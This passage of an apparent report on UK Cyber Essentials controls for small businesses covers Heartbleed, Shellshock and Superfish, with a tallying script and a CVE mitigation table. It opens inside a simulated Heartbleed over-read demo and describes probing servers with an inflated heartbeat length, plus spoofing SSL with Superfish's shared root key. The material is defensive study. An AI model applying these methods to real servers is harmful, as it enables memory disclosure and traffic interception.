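    # Constructed neighbouring heap contents: what an attacker hopes to find.
    neighbour = b"session=abc123; -----BEGIN RSA PRIVATE KEY-----..."
    memory = record + neighbour
    vuln = handle_vulnerable(memory, 0)
    fixed = handle_fixed(memory, 0, len(record))
    return vuln, fixed


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable response leaks private key:", b"PRIVATE KEY" in vuln)
    print("fixed response:", fixed)
```

The response from the vulnerable handler contains the neighbouring bytes, which is exactly why the leak was invisible in server logs: nothing failed, a well-formed heartbeat response went back. A practitioner scanning their own estate would send a request with a small payload and an inflated length and check whether the reply is larger than the record sent.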

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and the other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects. Note also that patching alone does not undo what may already have been leaked: a server that was exposed while vulnerable should have its private keys and certificates re-issued and its users' sessions and passwords reset.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.

"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is the Superfish software breaking the chain of trust for SSL certificates by installing a self-signed root CA certificate into the list of trusted certificates on the host machine, with the same private key on every installation. This allows an attacker to sign their own server certificates with that key, which can easily be extracted from any other machine running Superfish, and so to intercept any SSL-secured connection from the target machine without the browser raising a warning.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves[11], and the issue is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock. Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed. The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the fix, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight could not be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance, and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to the Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
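The proportions quoted in this section come from the per-CVE assessment in the appendix table, and the following added example (not tooling from the report) makes that tally reproducible: it parses appendix rows in a pipe-separated layout of its own, maps the table's free-text labels onto the five Cyber Essentials controls via an alias table that is this script's assumption, and counts With-CE outcomes and per-control contributions. The embedded rows are copied from the appendix but are only a subset, so the percentages describe that sample rather than the full set of two hundred vulnerabilities.

```python
"""Tally With-CE outcomes and control applicability over rows of the
'Cyber Controls Applicability' table.

Added example, not tooling from the Security Lancaster report. The row
layout and the alias-to-control mapping are this script's assumptions."""
import re
from collections import Counter

# Assumed mapping from the table's free-text labels onto the five Cyber
# Essentials controls; a label matching none is counted as "Other"
# (e.g. Website Blacklisting, SSL, Firmware Updates).
CONTROL_ALIASES = {
    "Boundary Firewalls": ("firewall", "anti dos", "anti-dos"),
    "Secure Configuration": ("secure configuration",),
    "Access Control": ("access control", "access policy",
                       "user access", "strong password"),
    "Malware Protection": ("anti-malware", "malware protection"),
    "Patch Management": ("patch management",),
}

WITH_CE_OUTCOMES = ("Mitigated", "Partially Mitigated", "Not Mitigated")

# Rows copied from the appendix table (a subset: the proportions computed
# here describe this sample, not the report's full 200-vulnerability set).
SAMPLE_TABLE = """\
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls include anti-DOS
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access)
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware
"""


def canonical_controls(cell):
    """Map one 'Controls' cell onto the set of CE controls it names."""
    found = set()
    for item in re.split(r"[,&]", cell):
        label = item.strip().lower()
        if not label:
            continue
        hits = {name for name, keys in CONTROL_ALIASES.items()
                if any(key in label for key in keys)}
        found |= hits or {"Other"}
    return found


def parse_rows(text):
    """Parse data rows (lines starting with 'CVE-'); reject malformed ones."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("CVE-"):
            continue  # header row or stray text
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 9:
            raise ValueError(f"expected 9 cells, got {len(cells)}: {line!r}")
        cve, flags, no_ce, with_ce, controls = (
            cells[0], cells[1:6], cells[6], cells[7], cells[8])
        if any(flag not in ("y", "n") for flag in flags):
            raise ValueError(f"bad applicability flag in {cve}: {flags}")
        if with_ce not in WITH_CE_OUTCOMES:
            raise ValueError(f"unknown With-CE outcome {with_ce!r} in {cve}")
        rows.append({
            "cve": cve,
            "applicable": [flag == "y" for flag in flags],  # SME1..4, Idealised
            "no_ce": no_ce,
            "with_ce": with_ce,
            "controls": canonical_controls(controls),
        })
    return rows


def tally(rows):
    """Count With-CE outcomes, how many rows each control contributes to,
    and the CVEs CE cannot mitigate (the report's 'do not install' cases)."""
    return {
        "rows": len(rows),
        "outcomes": Counter(r["with_ce"] for r in rows),
        "controls": Counter(c for r in rows for c in r["controls"]),
        "applicable_to_some_sme": sum(1 for r in rows if any(r["applicable"])),
        "unmitigated": [r["cve"] for r in rows if r["with_ce"] == "Not Mitigated"],
    }


def proportion(count, total):
    """Percentage of rows, to one decimal place as the report quotes them."""
    return round(100.0 * count / total, 1) if total else 0.0


if __name__ == "__main__":
    result = tally(parse_rows(SAMPLE_TABLE))
    n = result["rows"]
    print(f"{n} rows, {result['applicable_to_some_sme']} applicable to at least one SME")
    for outcome in WITH_CE_OUTCOMES:
        count = result["outcomes"][outcome]
        print(f"  With CE: {outcome:<20} {count:>3} ({proportion(count, n)}%)")
    for name, count in result["controls"].most_common():
        print(f"  {name:<22} contributes to {count} rows ({proportion(count, n)}%)")
    print("  Not mitigated by CE (do not install):", ", ".join(result["unmitigated"]))
```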

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not under the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls
--- | --- | --- | --- | --- | --- | --- | --- | ---
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated | Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated | Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
